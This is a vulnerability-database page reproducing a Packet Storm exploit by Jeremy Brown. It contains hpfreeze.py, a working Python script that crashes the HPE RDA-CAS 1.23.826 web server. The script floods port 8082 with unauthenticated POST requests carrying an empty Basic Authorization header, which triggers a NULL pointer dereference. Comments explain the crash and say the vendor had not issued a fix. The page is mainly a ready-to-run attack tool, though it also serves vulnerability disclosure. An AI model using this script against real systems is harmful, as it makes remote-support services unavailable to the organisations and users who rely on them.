Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

HPE RDA-CAS 1.23.826 Denial Of Service

🗓️ 23 Jun 2021 00:00:00Reported by Jeremy BrownType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 272 Views

HPE RDA-CAS 1.23.826 Denial Of Servic

Code
`#!/usr/bin/python  
# -*- coding: UTF-8 -*-  
#  
# hpfreeze.py  
#  
# HPE Remote Device Access Unauthenticated Denial of Service  
#  
# Jeremy Brown [jbrown3264/gmail]  
# June 2021  
#  
# "Designed for the enterprise, HPE RDA (Remote Device Access) provides integrated remote  
# connectivity for support automation, device telemetry and remote service delivery."  
#  
# More info: https://midway.ext.hpe.com  
#  
# rda-cas web server could not gracefully handle a blank or malformed BASIC auth string.  
#  
# Program received signal SIGSEGV, Segmentation fault.  
# 0x00007f4693362a5c in rda::base64_decode(std::string const&) () from /lib/librda.so.1  
#  
# Typical NULL ptr deref. It will automatically restart itself after handling one  
# of these malformed requests, but quickly sending many of them will make the server  
# give up on recovery and become unavailable to users. '=' instead of nothing for an  
# auth string will also make it crash in a different parsing routine. The server can  
# be configured at setup to listen on either localhost or the network interface.  
#  
# > ./hpfreeze.py rdacas-host  
# ;p;P;p;P;p;P;p;P;p;P;p;P  
#  
# (If users have the web UI open, they may see "Connection to the RDA-CAS has been lost")  
#  
# Tested  
# - RDA-CAS Version: 1.23.826  
# -- rda-cas_1.23-826+deb10_amd64.deb  
#  
# Fix  
# - "the issue will be remediated in an imminent release" with no further reply  
#  
  
import sys  
import argparse  
import requests  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
DEFAULT_PORT = 8082  
HOW_MANY_TIMES = 1024  
  
class HPFreeze(object):  
def __init__(self, args):  
self.target = args.target  
  
def run(self):  
target = "https://" + self.target + ':' + str(DEFAULT_PORT)  
  
session = requests.Session()  
session.verify = False  
  
# rocket science  
headers = {'Authorization':"Basic"}  
  
for i in range(HOW_MANY_TIMES):  
try:  
resp = session.post(target + "/", headers=headers)  
except Exception as error:  
if('RemoteDisconnected' in str(error)):  
print(";p;P", end='')  
print()  
  
return 0  
  
def arg_parse():  
parser = argparse.ArgumentParser()  
  
parser.add_argument("target",  
type=str,  
help="HPE RDA host")  
  
args = parser.parse_args()  
  
return args  
  
def main():  
args = arg_parse()  
  
hpf = HPFreeze(args)  
  
result = hpf.run()  
  
if(result > 0):  
sys.exit(-1)  
  
if(__name__ == '__main__'):  
main()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
23 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4
hpe remote device accessunauthenticateddenial of servicesegmentation faultremotedisconnectedhpe rda host
272